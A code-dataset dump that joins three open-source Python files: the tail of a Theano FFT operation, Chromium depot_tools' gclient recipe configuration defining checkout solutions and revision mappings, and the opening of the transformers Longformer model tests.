' of type integer' % self.__class__.__name__)
elif axis.ndim != 0 or (isinstance(axis, tensor.TensorConstant) and
(axis.data < 0 or axis.data > a.ndim - 1)):
raise TypeError('%s: index of the transformed axis must be'
' a scalar not smaller than 0 and smaller than'
' dimension of array' % self.__class__.__name__)
if n is None:
n = a.shape[axis]
n = tensor.as_tensor_variable(n)
else:
n = tensor.as_tensor_variable(n)
if (not n.dtype.startswith('int')) and \
(not n.dtype.startswith('uint')):
raise TypeError('%s: length of the transformed axis must be'
' of type integer' % self.__class__.__name__)
elif n.ndim != 0 or (isinstance(n, tensor.TensorConstant) and
n.data < 1):
raise TypeError('%s: length of the transformed axis must be a'
' strictly positive scalar'
% self.__class__.__name__)
return gof.Apply(self, [a, n, axis], [tensor.TensorType('complex128',
a.type.broadcastable)()])
def infer_shape(self, node, in_shapes):
shape_a = in_shapes[0]
n = node.inputs[1]
axis = node.inputs[2]
if len(shape_a) == 1:
return [(n,)]
elif isinstance(axis, tensor.TensorConstant):
out_shape = (list(shape_a[0: axis.data.item()]) + [n] +
list(shape_a[axis.data + 1:]))
else:
l = len(shape_a)
shape_a = tensor.stack(shape_a)
out_shape = tensor.concatenate((shape_a[0: axis], [n],
shape_a[axis + 1:]))
n_splits = [1] * l
out_shape = tensor.split(out_shape, n_splits, l)
out_shape = [a[0] for a in out_shape]
return [out_shape]
def perform(self, node, inputs, output_storage):
a = inputs[0]
n = inputs[1]
axis = inputs[2]
output_storage[0][0] = numpy.fft.fft(a, n=int(n), axis=axis.item())
def grad(self, inputs, cost_grad):
"""
In defining the gradient, the Finite Fourier Transform is viewed as
a complex-differentiable function of a complex variable
"""
a = inputs[0]
n = inputs[1]
axis = inputs[2]
grad = cost_grad[0]
if not isinstance(axis, tensor.TensorConstant):
raise NotImplementedError('%s: gradient is currently implemented'
' only for axis being a Theano constant'
% self.__class__.__name__)
axis = int(axis.data)
# notice that the number of actual elements in wrto is independent of
# possible padding or truncation:
elem = tensor.arange(0, tensor.shape(a)[axis], 1)
# accounts for padding:
freq = tensor.arange(0, n, 1)
outer = tensor.outer(freq, elem)
pow_outer = tensor.exp(((-2 * math.pi * 1j) * outer) / (1. * n))
res = tensor.tensordot(grad, pow_outer, (axis, 0))
# This would be simpler but not implemented by theano:
# res = tensor.switch(tensor.lt(n, tensor.shape(a)[axis]),
# tensor.set_subtensor(res[...,n::], 0, False, False), res)
# Instead we resort to that to account for truncation:
flip_shape = list(numpy.arange(0, a.ndim)[::-1])
res = res.dimshuffle(flip_shape)
res = tensor.switch(tensor.lt(n, tensor.shape(a)[axis]),
tensor.set_subtensor(res[n::, ], 0, False, False),
res)
res = res.dimshuffle(flip_shape)
# insures that gradient shape conforms to input shape:
out_shape = list(numpy.arange(0, axis)) + [a.ndim - 1] +\
list(numpy.arange(axis, a.ndim - 1))
res = res.dimshuffle(*out_shape)
return [res, None, None]
fft = Fourier()
| 44.636364 | 80 | 0.573085 |
b8152734b11bf7d14fdc6d71af65103a2719b4d7 | 23,145 | py | Python | depot_tools/recipe_modules/gclient/config.py | bopopescu/MQUIC | 703e944ec981366cfd2528943b1def2c72b7e49d | [
"MIT"
] | 1 | 2018-01-02T15:42:08.000Z | 2018-01-02T15:42:08.000Z | depot_tools/recipe_modules/gclient/config.py | bopopescu/MQUIC | 703e944ec981366cfd2528943b1def2c72b7e49d | [
"MIT"
] | null | null | null | depot_tools/recipe_modules/gclient/config.py | bopopescu/MQUIC | 703e944ec981366cfd2528943b1def2c72b7e49d | [
"MIT"
] | 1 | 2020-07-25T02:05:49.000Z | 2020-07-25T02:05:49.000Z | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import types
from recipe_engine.config import config_item_context, ConfigGroup, BadConf
from recipe_engine.config import ConfigList, Dict, Single, Static, Set, List
from . import api as gclient_api
def BaseConfig(USE_MIRROR=True, GIT_MODE=False, CACHE_DIR=None,
PATCH_PROJECT=None, BUILDSPEC_VERSION=None,
**_kwargs):
deps = '.DEPS.git' if GIT_MODE else 'DEPS'
cache_dir = str(CACHE_DIR) if GIT_MODE and CACHE_DIR else None
return ConfigGroup(
solutions = ConfigList(
lambda: ConfigGroup(
name = Single(basestring),
url = Single(basestring),
deps_file = Single(basestring, empty_val=deps, required=False,
hidden=False),
managed = Single(bool, empty_val=True, required=False, hidden=False),
custom_deps = Dict(value_type=(basestring, types.NoneType)),
custom_vars = Dict(value_type=basestring),
safesync_url = Single(basestring, required=False),
revision = Single(
(basestring, gclient_api.RevisionResolver),
required=False, hidden=True),
)
),
deps_os = Dict(value_type=basestring),
hooks = List(basestring),
target_os = Set(basestring),
target_os_only = Single(bool, empty_val=False, required=False),
cache_dir = Static(cache_dir, hidden=False),
# If supplied, use this as the source root (instead of the first solution's
# checkout).
src_root = Single(basestring, required=False, hidden=True),
# Maps 'solution' -> build_property
got_revision_mapping = Dict(hidden=True),
# Addition revisions we want to pass in. For now theres a duplication
# of code here of setting custom vars AND passing in --revision. We hope
# to remove custom vars later.
revisions = Dict(
value_type=(basestring, gclient_api.RevisionResolver),
hidden=True),
# TODO(iannucci): HACK! The use of None here to indicate that we apply this
# to the solution.revision field is really terrible. I mostly blame
# gclient.
# Maps 'parent_build_property' -> 'custom_var_name'
# Maps 'parent_build_property' -> None
# If value is None, the property value will be applied to
# solutions[0].revision. Otherwise, it will be applied to
# solutions[0].custom_vars['custom_var_name']
parent_got_revision_mapping = Dict(hidden=True),
delete_unversioned_trees = Single(bool, empty_val=True, required=False),
# Check out refs/branch-heads.
# TODO (machenbach): Only implemented for bot_update atm.
with_branch_heads = Single(
bool,
empty_val=False,
required=False,
hidden=True),
GIT_MODE = Static(bool(GIT_MODE)),
USE_MIRROR = Static(bool(USE_MIRROR)),
PATCH_PROJECT = Static(str(PATCH_PROJECT), hidden=True),
BUILDSPEC_VERSION= Static(BUILDSPEC_VERSION, hidden=True),
)
config_ctx = config_item_context(BaseConfig)
def ChromiumSvnSubURL(c, *pieces):
BASES = ('https://src.chromium.org',
'svn://svn-mirror.golo.chromium.org')
return '/'.join((BASES[c.USE_MIRROR],) + pieces)
def ChromiumGitURL(_c, *pieces):
return '/'.join(('https://chromium.googlesource.com',) + pieces)
def ChromiumSrcURL(c):
# TODO(phajdan.jr): Move to proper repo and add coverage.
if c.GIT_MODE: # pragma: no cover
return ChromiumGitURL(c, 'chromium', 'src.git')
else:
return ChromiumSvnSubURL(c, 'chrome', 'trunk', 'src')
def BlinkURL(c):
# TODO(phajdan.jr): Move to proper repo and add coverage.
if c.GIT_MODE: # pragma: no cover
return ChromiumGitURL(c, 'chromium', 'blink.git')
else:
return ChromiumSvnSubURL(c, 'blink', 'trunk')
def ChromeSvnSubURL(c, *pieces):
BASES = ('svn://svn.chromium.org',
'svn://svn-mirror.golo.chromium.org')
return '/'.join((BASES[c.USE_MIRROR],) + pieces)
# TODO(phajdan.jr): Move to proper repo and add coverage.
def ChromeInternalGitURL(_c, *pieces): # pragma: no cover
return '/'.join(('https://chrome-internal.googlesource.com',) + pieces)
def ChromeInternalSrcURL(c):
# TODO(phajdan.jr): Move to proper repo and add coverage.
if c.GIT_MODE: # pragma: no cover
return ChromeInternalGitURL(c, 'chrome', 'src-internal.git')
else:
return ChromeSvnSubURL(c, 'chrome-internal', 'trunk', 'src-internal')
def mirror_only(c, obj, default=None):
return obj if c.USE_MIRROR else (default or obj.__class__())
@config_ctx()
def chromium_bare(c):
s = c.solutions.add()
s.name = 'src'
s.url = ChromiumSrcURL(c)
s.custom_vars = mirror_only(c, {
'googlecode_url': 'svn://svn-mirror.golo.chromium.org/%s',
'nacl_trunk': 'svn://svn-mirror.golo.chromium.org/native_client/trunk',
'sourceforge_url': 'svn://svn-mirror.golo.chromium.org/%(repo)s',
'webkit_trunk': BlinkURL(c)})
m = c.got_revision_mapping
m['src'] = 'got_revision'
m['src/native_client'] = 'got_nacl_revision'
m['src/tools/swarming_client'] = 'got_swarming_client_revision'
m['src/v8'] = 'got_v8_revision'
m['src/third_party/angle'] = 'got_angle_revision'
m['src/third_party/webrtc'] = 'got_webrtc_revision'
p = c.parent_got_revision_mapping
p['parent_got_revision'] = None
p['parent_got_angle_revision'] = 'angle_revision'
p['parent_got_nacl_revision'] = 'nacl_revision'
p['parent_got_swarming_client_revision'] = 'swarming_revision'
p['parent_got_v8_revision'] = 'v8_revision'
p['parent_got_webrtc_revision'] = 'webrtc_revision'
# Patch project revisions are applied whenever patch_project is set. E.g. if
# a v8 stand-alone patch is sent to a chromium trybot, patch_project is v8
# and can be used to sync v8 to HEAD instead of the pinned chromium
# version.
patch_project_revisions = {
'v8': ('src/v8', 'HEAD'),
}
patch_revision = patch_project_revisions.get(c.PATCH_PROJECT)
# TODO(phajdan.jr): Move to proper repo and add coverage.
if patch_revision: # pragma: no cover
c.revisions[patch_revision[0]] = patch_revision[1]
@config_ctx(includes=['chromium_bare'])
def chromium_empty(c):
c.solutions[0].deps_file = '' # pragma: no cover
@config_ctx(includes=['chromium_bare'])
def chromium(c):
s = c.solutions[0]
s.custom_deps = mirror_only(c, {})
@config_ctx(includes=['chromium'])
def chromium_lkcr(c):
# TODO(phajdan.jr): Add git hashes for LKCR crbug.com/349277.
if c.GIT_MODE:
raise BadConf('Git has problems with safesync_url and LKCR, '
'crbug.com/349277 crbug.com/109191') # pragma: no cover
s = c.solutions[0]
s.safesync_url = 'https://build.chromium.org/p/chromium/lkcr-status/lkgr'
# TODO(hinoka): Once lkcr exists and is a tag, it should just be lkcr
# rather than origin/lkcr.
s.revision = 'origin/lkcr'
@config_ctx(includes=['chromium'])
def chromium_lkgr(c):
s = c.solutions[0]
safesync_url = 'https://chromium-status.appspot.com/lkgr'
if c.GIT_MODE: # pragma: no cover
safesync_url = 'https://chromium-status.appspot.com/git-lkgr'
raise BadConf('Git has problems with safesync_url, crbug.com/109191.')
s.safesync_url = safesync_url
s.revision = 'origin/lkgr'
@config_ctx(includes=['chromium_bare'])
def android_bare(c):
# We inherit from chromium_bare to get the got_revision mapping.
# NOTE: We don't set a specific got_revision mapping for src/repo.
del c.solutions[0]
c.got_revision_mapping['src'] = 'got_src_revision'
s = c.solutions.add()
s.deps_file = '.DEPS.git'
# TODO(iannucci,vadimsh): Switch this to src-limited
@config_ctx()
def chrome_internal(c):
s = c.solutions.add()
s.name = 'src-internal'
s.url = ChromeInternalSrcURL(c)
# Remove some things which are generally not needed
s.custom_deps = {
"src/data/autodiscovery" : None,
"src/data/page_cycler" : None,
"src/tools/grit/grit/test/data" : None,
"src/chrome/test/data/perf/frame_rate/private" : None,
"src/data/mozilla_js_tests" : None,
"src/chrome/test/data/firefox2_profile/searchplugins" : None,
"src/chrome/test/data/firefox2_searchplugins" : None,
"src/chrome/test/data/firefox3_profile/searchplugins" : None,
"src/chrome/test/data/firefox3_searchplugins" : None,
"src/chrome/test/data/ssl/certs" : None,
"src/data/mach_ports" : None,
"src/data/esctf" : None,
"src/data/selenium_core" : None,
"src/chrome/test/data/plugin" : None,
"src/data/memory_test" : None,
"src/data/tab_switching" : None,
"src/chrome/test/data/osdd" : None,
"src/webkit/data/bmp_decoder":None,
"src/webkit/data/ico_decoder":None,
"src/webkit/data/test_shell/plugins":None,
"src/webkit/data/xbm_decoder":None,
}
@config_ctx(includes=['chromium'])
def blink(c):
c.solutions[0].revision = 'HEAD'
del c.solutions[0].custom_deps
c.revisions['src/third_party/WebKit'] = 'HEAD'
@config_ctx(includes=['chromium'])
def blink_or_chromium(c):
c.solutions[0].revision = gclient_api.ProjectRevisionResolver('chromium')
del c.solutions[0].custom_deps
c.revisions['src/third_party/WebKit'] = \
gclient_api.ProjectRevisionResolver(
'webkit', parent_got_revision='parent_got_webkit_revision')
# TODO(phajdan.jr): Move to proper repo and add coverage.
@config_ctx(includes=['chromium'])
def blink_merged(c): # pragma: no cover
c.solutions[0].url = \
'https://chromium.googlesource.com/playground/chromium-blink-merge.git'
@config_ctx()
def android(c):
c.target_os.add('android')
@config_ctx(includes=['chromium', 'chrome_internal'])
def ios(c):
c.target_os.add('ios')
@config_ctx(includes=['chromium'])
def show_v8_revision(c):
# Have the V8 revision appear in the web UI instead of Chromium's.
c.got_revision_mapping['src'] = 'got_cr_revision'
c.got_revision_mapping['src/v8'] = 'got_revision'
# Needed to get the testers to properly sync the right revision.
c.parent_got_revision_mapping['parent_got_revision'] = 'got_revision'
@config_ctx(includes=['chromium'])
def v8_bleeding_edge_git(c):
c.solutions[0].revision = 'HEAD'
# TODO(machenbach): If bot_update is activated for all v8-chromium bots
# and there's no gclient fallback, then the following line can be removed.
c.solutions[0].custom_vars['v8_branch'] = 'branches/bleeding_edge'
c.revisions['src/v8'] = 'HEAD'
@config_ctx()
def v8_canary(c):
c.revisions['src/v8'] = 'origin/canary'
@config_ctx(includes=['chromium'])
def oilpan(c): # pragma: no cover
if c.GIT_MODE:
raise BadConf("Oilpan requires SVN for now")
c.solutions[0].custom_vars = {
'webkit_trunk': ChromiumSvnSubURL(c, 'blink', 'branches', 'oilpan')
}
c.solutions[0].custom_vars['sourceforge_url'] = mirror_only(
c,
'svn://svn-mirror.golo.chromium.org/%(repo)s',
'svn://svn.chromium.org/%(repo)s'
)
c.revisions['src/third_party/WebKit'] = 'HEAD'
c.solutions[0].revision = '197341'
c.solutions[0].custom_deps = {
'src/chrome/tools/test/reference_build/chrome_linux' :
ChromiumSvnSubURL(c, 'blink', 'branches', 'oilpan', 'Tools',
'reference_build', 'chrome_linux')
}
del c.got_revision_mapping['src']
c.got_revision_mapping['src/third_party/WebKit/Source'] = 'got_revision'
@config_ctx(includes=['oilpan', 'chrome_internal'])
def oilpan_internal(c): # pragma: no cover
# Add back the oilpan data dependencies
needed_components_internal = [
"src/data/memory_test",
"src/data/mozilla_js_tests",
"src/data/page_cycler",
"src/data/tab_switching",
"src/webkit/data/bmp_decoder",
"src/webkit/data/ico_decoder",
"src/webkit/data/test_shell/plugins",
"src/webkit/data/xbm_decoder",
]
for key in needed_components_internal:
del c.solutions[1].custom_deps[key]
@config_ctx()
def nacl(c):
s = c.solutions.add()
s.name = 'native_client'
s.url = ChromiumGitURL(c, 'native_client', 'src', 'native_client.git')
m = c.got_revision_mapping
m['native_client'] = 'got_revision'
@config_ctx()
def webports(c):
s = c.solutions.add()
s.name = 'src'
s.url = ChromiumGitURL(c, 'webports.git')
m = c.got_revision_mapping
m['src'] = 'got_revision'
@config_ctx()
def wasm_llvm(c):
s = c.solutions.add()
s.name = 'src'
s.url = ChromiumGitURL(
c, 'external', 'github.com', 'WebAssembly', 'waterfall.git')
m = c.got_revision_mapping
m['src'] = 'got_waterfall_revision'
c.revisions['src'] = 'origin/master'
@config_ctx()
def gyp(c):
s = c.solutions.add()
s.name = 'gyp'
s.url = ChromiumGitURL(c, 'external', 'gyp.git')
m = c.got_revision_mapping
m['gyp'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def build(c): # pragma: no cover
if not c.GIT_MODE:
raise BadConf('build only supports git')
s = c.solutions.add()
s.name = 'build'
s.url = ChromiumGitURL(c, 'chromium', 'tools', 'build.git')
m = c.got_revision_mapping
m['build'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def depot_tools(c): # pragma: no cover
if not c.GIT_MODE:
raise BadConf('depot_tools only supports git')
s = c.solutions.add()
s.name = 'depot_tools'
s.url = ChromiumGitURL(c, 'chromium', 'tools', 'depot_tools.git')
m = c.got_revision_mapping
m['depot_tools'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def skia(c): # pragma: no cover
if not c.GIT_MODE:
raise BadConf('skia only supports git')
s = c.solutions.add()
s.name = 'skia'
s.url = 'https://skia.googlesource.com/skia.git'
m = c.got_revision_mapping
m['skia'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def chrome_golo(c): # pragma: no cover
if not c.GIT_MODE:
raise BadConf('chrome_golo only supports git')
s = c.solutions.add()
s.name = 'chrome_golo'
s.url = 'https://chrome-internal.googlesource.com/chrome-golo/chrome-golo.git'
c.got_revision_mapping['chrome_golo'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def build_internal(c):
if not c.GIT_MODE: # pragma: no cover
raise BadConf('build_internal only supports git')
s = c.solutions.add()
s.name = 'build_internal'
s.url = 'https://chrome-internal.googlesource.com/chrome/tools/build.git'
c.got_revision_mapping['build_internal'] = 'got_revision'
# We do not use 'includes' here, because we want build_internal to be the
# first solution in the list as run_presubmit computes upstream revision
# from the first solution.
build(c)
c.got_revision_mapping['build'] = 'got_build_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def build_internal_scripts_slave(c):
if not c.GIT_MODE: # pragma: no cover
raise BadConf('build_internal_scripts_slave only supports git')
s = c.solutions.add()
s.name = 'build_internal/scripts/slave'
s.url = ('https://chrome-internal.googlesource.com/'
'chrome/tools/build_limited/scripts/slave.git')
c.got_revision_mapping['build_internal/scripts/slave'] = 'got_revision'
# We do not use 'includes' here, because we want build_internal to be the
# first solution in the list as run_presubmit computes upstream revision
# from the first solution.
build(c)
c.got_revision_mapping['build'] = 'got_build_revision'
@config_ctx()
def master_deps(c):
s = c.solutions.add()
s.name = 'build_internal/master.DEPS'
s.url = ('https://chrome-internal.googlesource.com/'
'chrome/tools/build/master.DEPS.git')
c.got_revision_mapping['build_internal/master.DEPS'] = 'got_revision'
@config_ctx()
def slave_deps(c):
s = c.solutions.add()
s.name = 'build_internal/slave.DEPS'
s.url = ('https://chrome-internal.googlesource.com/'
'chrome/tools/build/slave.DEPS.git')
c.got_revision_mapping['build_internal/slave.DEPS'] = 'got_revision'
@config_ctx()
def internal_deps(c):
s = c.solutions.add()
s.name = 'build_internal/internal.DEPS'
s.url = ('https://chrome-internal.googlesource.com/'
'chrome/tools/build/internal.DEPS.git')
c.got_revision_mapping['build_internal/internal.DEPS'] = 'got_revision'
@config_ctx(includes=['chromium', 'chrome_internal'])
def perf(c):
s = c.solutions[0]
s.custom_vars['llvm_url'] = 'svn://svn-mirror.golo.chromium.org/llvm-project'
s.managed = False
needed_components_internal = [
"src/data/page_cycler",
]
for key in needed_components_internal:
del c.solutions[1].custom_deps[key]
c.solutions[1].managed = False
@config_ctx(includes=['chromium'])
def chromium_skia(c):
c.solutions[0].revision = 'HEAD'
del c.solutions[0].custom_deps
c.revisions['src/third_party/skia'] = (
gclient_api.RevisionFallbackChain('origin/master'))
c.got_revision_mapping['src'] = 'got_chromium_revision'
c.got_revision_mapping['src/third_party/skia'] = 'got_revision'
c.parent_got_revision_mapping['parent_got_revision'] = 'got_revision'
@config_ctx(includes=['chromium'])
def chromium_webrtc(c):
c.got_revision_mapping['src/third_party/libjingle/source/talk'] = (
'got_libjingle_revision')
c.got_revision_mapping['src/third_party/libvpx/source'] = (
'got_libvpx_revision')
@config_ctx(includes=['chromium_webrtc'])
def chromium_webrtc_tot(c):
"""Configures ToT revisions for WebRTC and Libjingle for Chromium.
Sets up ToT instead of the DEPS-pinned revision for WebRTC and Libjingle.
This is used for some bots to provide data about which revisions are green to
roll into Chromium.
"""
c.revisions['src'] = 'HEAD'
c.revisions['src/third_party/webrtc'] = 'HEAD'
c.revisions['src/third_party/libjingle/source/talk'] = 'HEAD'
@config_ctx()
def webrtc_test_resources(c):
"""Add webrtc.DEPS solution for test resources and tools.
The webrtc.DEPS solution pulls in additional resources needed for running
WebRTC-specific test setups in Chromium.
"""
s = c.solutions.add()
s.name = 'webrtc.DEPS'
s.url = ChromiumGitURL(c, 'chromium', 'deps', 'webrtc', 'webrtc.DEPS')
s.deps_file = 'DEPS'
@config_ctx()
def pdfium(c):
soln = c.solutions.add()
soln.name = 'pdfium'
soln.url = 'https://pdfium.googlesource.com/pdfium.git'
@config_ctx()
def mojo(c):
soln = c.solutions.add()
soln.name = 'src'
soln.url = 'https://chromium.googlesource.com/external/mojo.git'
@config_ctx()
def crashpad(c):
soln = c.solutions.add()
soln.name = 'crashpad'
soln.url = 'https://chromium.googlesource.com/crashpad/crashpad.git'
@config_ctx()
def boringssl(c):
soln = c.solutions.add()
soln.name = 'boringssl'
soln.url = 'https://boringssl.googlesource.com/boringssl.git'
soln.deps_file = 'util/bot/DEPS'
@config_ctx()
def dart(c):
soln = c.solutions.add()
soln.name = 'sdk'
soln.url = ('https://chromium.googlesource.com/external/github.com/' +
'dart-lang/sdk.git')
soln.deps_file = 'DEPS'
soln.managed = False
@config_ctx(config_vars={'GIT_MODE': True})
def infra(c):
soln = c.solutions.add()
soln.name = 'infra'
soln.url = 'https://chromium.googlesource.com/infra/infra.git'
c.got_revision_mapping['infra'] = 'got_revision'
@config_ctx(config_vars={'GIT_MODE': True})
def infra_internal(c): # pragma: no cover
soln = c.solutions.add()
soln.name = 'infra_internal'
soln.url = 'https://chrome-internal.googlesource.com/infra/infra_internal.git'
c.got_revision_mapping['infra_internal'] = 'got_revision'
@config_ctx(includes=['infra'])
def luci_gae(c):
# luci/gae is checked out as a part of infra.git solution at HEAD.
c.revisions['infra'] = 'origin/master'
# luci/gae is developed together with luci-go, which should be at HEAD.
c.revisions['infra/go/src/github.com/luci/luci-go'] = 'origin/master'
c.revisions['infra/go/src/github.com/luci/gae'] = (
gclient_api.RevisionFallbackChain('origin/master'))
m = c.got_revision_mapping
del m['infra']
m['infra/go/src/github.com/luci/gae'] = 'got_revision'
@config_ctx(includes=['infra'])
def luci_go(c):
# luci-go is checked out as a part of infra.git solution at HEAD.
c.revisions['infra'] = 'origin/master'
c.revisions['infra/go/src/github.com/luci/luci-go'] = (
gclient_api.RevisionFallbackChain('origin/master'))
m = c.got_revision_mapping
del m['infra']
m['infra/go/src/github.com/luci/luci-go'] = 'got_revision'
@config_ctx(includes=['infra'])
def luci_py(c):
# luci-py is checked out as part of infra just to have appengine
# pre-installed, as that's what luci-py PRESUBMIT relies on.
c.revisions['infra'] = 'origin/master'
c.revisions['infra/luci'] = (
gclient_api.RevisionFallbackChain('origin/master'))
m = c.got_revision_mapping
del m['infra']
m['infra/luci'] = 'got_revision'
@config_ctx(includes=['infra'])
def recipes_py(c):
c.revisions['infra'] = 'origin/master'
c.revisions['infra/recipes-py'] = (
gclient_api.RevisionFallbackChain('origin/master'))
m = c.got_revision_mapping
del m['infra']
m['infra/recipes-py'] = 'got_revision'
@config_ctx()
def chrome_from_buildspec(c): # pragma: no cover
soln = c.solutions.add()
soln.name = 'chrome_from_buildspec'
# This URL has to be augmented with the appropriate bucket by the recipe using
# it.
soln.url = ('svn://svn-mirror.golo.chromium.org/chrome-internal/trunk/tools/'
'buildspec/build/')
soln.custom_vars['svn_url'] = 'svn://svn-mirror.golo.chromium.org'
soln.custom_deps = {}
@config_ctx()
def catapult(c):
soln = c.solutions.add()
soln.name = 'catapult'
soln.url = ('https://chromium.googlesource.com/external/github.com/'
'catapult-project/catapult.git')
c.got_revision_mapping['catapult'] = 'got_revision'
@config_ctx(includes=['infra_internal'], config_vars={'GIT_MODE': True})
def infradata_master_manager(c):
soln = c.solutions.add()
soln.name = 'infra-data-master-manager'
soln.url = (
'https://chrome-internal.googlesource.com/infradata/master-manager.git')
c.got_revision_mapping['infra-data-master-manager'] = 'got_revision'
@config_ctx()
def with_branch_heads(c):
c.with_branch_heads = True
@config_ctx()
def custom_tabs_client(c):
soln = c.solutions.add()
soln.name = 'custom_tabs_client'
# TODO(pasko): test custom-tabs-client within a full chromium checkout.
soln.url = ('https://chromium.googlesource.com/external/github.com/'
'GoogleChrome/custom-tabs-client.git')
c.got_revision_mapping['custom_tabs_client'] = 'got_revision'
# TODO(phajdan.jr): Move to proper repo and add coverage.
@config_ctx()
def angle_top_of_tree(c): # pragma: no cover
"""Configures the top-of-tree ANGLE in a Chromium checkout.
Sets up ToT instead of the DEPS-pinned revision for ANGLE.
"""
c.solutions[0].revision = 'HEAD'
c.revisions['src/third_party/angle'] = 'HEAD'
@config_ctx()
def gerrit_test_cq_normal(c):
soln = c.solutions.add()
soln.name = 'gerrit-test-cq-normal'
soln.url = 'https://chromium.googlesource.com/playground/gerrit-cq/normal.git'
# TODO(phajdan.jr): Move to proper repo and add coverage.
@config_ctx()
def valgrind(c): # pragma: no cover
"""Add Valgrind binaries to the gclient solution."""
c.solutions[0].custom_deps['src/third_party/valgrind'] = \
ChromiumGitURL(c, 'chromium', 'deps', 'valgrind', 'binaries')
| 35.498466 | 80 | 0.7027 |
afbc812ae578c1c777d968fd5d61fa0ec8298a1f | 30,167 | py | Python | tests/test_modeling_longformer.py | gp201/transformers | 89f2781e87e92b04303f7f128107718e44e755ed | [
"Apache-2.0"
] | 1 | 2020-11-14T06:08:38.000Z | 2020-11-14T06:08:38.000Z | tests/test_modeling_longformer.py | gp201/transformers | 89f2781e87e92b04303f7f128107718e44e755ed | [
"Apache-2.0"
] | null | null | null | tests/test_modeling_longformer.py | gp201/transformers | 89f2781e87e92b04303f7f128107718e44e755ed | [
"Apache-2.0"
] | 2 | 2020-11-13T09:07:09.000Z | 2020-11-27T01:46:46.000Z | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import is_torch_available
from transformers.testing_utils import require_sentencepiece, require_tokenizers, require_torch, slow, torch_device
from .test_configuration_common import ConfigTester
from .test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
LongformerConfig,
LongformerForMaskedLM,
LongformerForMultipleChoice,
LongformerForQuestionAnswering,
LongformerForSequenceClassification,
LongformerForTokenClassification,
LongformerModel,
LongformerSelfAttention,
)
class LongformerModelTester:
def __init__(
self,
parent,
):
self.parent = parent
self.batch_size = 13
self.seq_length = 7
self.is_training = True
self.use_input_mask = True
self.use_token_type_ids = True
self.use_labels = True
self.vocab_size = 99
self.hidden_size = 32
self.num_hidden_layers = 5
self.num_attention_heads = 4
self.intermediate_size = 37
self.hidden_act = "gelu"
self.hidden_dropout_prob = 0.1
self.attention_probs_dropout_prob = 0.1
self.max_position_embeddings = 512
self.type_vocab_size = 16
self.type_sequence_label_size = 2
self.initializer_range = 0.02
self.num_labels = 3
self.num_choices = 4
self.scope = None
self.attention_window = 4
# `ModelTesterMixin.test_attention_outputs` is expecting attention tensors to be of size
# [num_attention_heads, encoder_seq_length, encoder_key_length], but LongformerSelfAttention
# returns attention of shape [num_attention_heads, encoder_seq_length, self.attention_window + 1]
# because its local attention only attends to `self.attention_window + 1` locations
# (assuming no token with global attention, otherwise the last dimension of attentions
# is x + self.attention_window + 1, where x is the number of tokens with global attention)
self.key_length = self.attention_window + 1
# because of padding `encoder_seq_length`, is different from `seq_length`. Relevant for
# the `test_attention_outputs` and `test_hidden_states_output` tests
self.encoder_seq_length = (
self.seq_length + (self.attention_window - self.seq_length % self.attention_window) % self.attention_window
)
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = random_attention_mask([self.batch_size, self.seq_length])
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
sequence_labels = None
token_labels = None
choice_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
choice_labels = ids_tensor([self.batch_size], self.num_choices)
config = LongformerConfig(
vocab_size=self.vocab_size,
hidden_size=self.hidden_size,
num_hidden_layers=self.num_hidden_layers,
num_attention_heads=self.num_attention_heads,
intermediate_size=self.intermediate_size,
hidden_act=self.hidden_act,
hidden_dropout_prob=self.hidden_dropout_prob,
attention_probs_dropout_prob=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
type_vocab_size=self.type_vocab_size,
initializer_range=self.initializer_range,
attention_window=self.attention_window,
return_dict=True,
)
return config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
def create_and_check_attention_mask_determinism(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = LongformerModel(config=config)
model.to(torch_device)
model.eval()
attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=torch_device)
output_with_mask = model(input_ids, attention_mask=attention_mask)["last_hidden_state"]
output_without_mask = model(input_ids)["last_hidden_state"]
self.parent.assertTrue(torch.allclose(output_with_mask[0, 0, :5], output_without_mask[0, 0, :5], atol=1e-4))
def create_and_check_longformer_model(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = LongformerModel(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids)
result = model(input_ids, token_type_ids=token_type_ids)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
self.parent.assertEqual(result.pooler_output.shape, (self.batch_size, self.hidden_size))
def create_and_check_longformer_model_with_global_attention_mask(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = LongformerModel(config=config)
model.to(torch_device)
model.eval()
global_attention_mask = input_mask.clone()
global_attention_mask[:, input_mask.shape[-1] // 2] = 0
global_attention_mask = global_attention_mask.to(torch_device)
result = model(
input_ids,
attention_mask=input_mask,
global_attention_mask=global_attention_mask,
token_type_ids=token_type_ids,
)
result = model(input_ids, token_type_ids=token_type_ids, global_attention_mask=global_attention_mask)
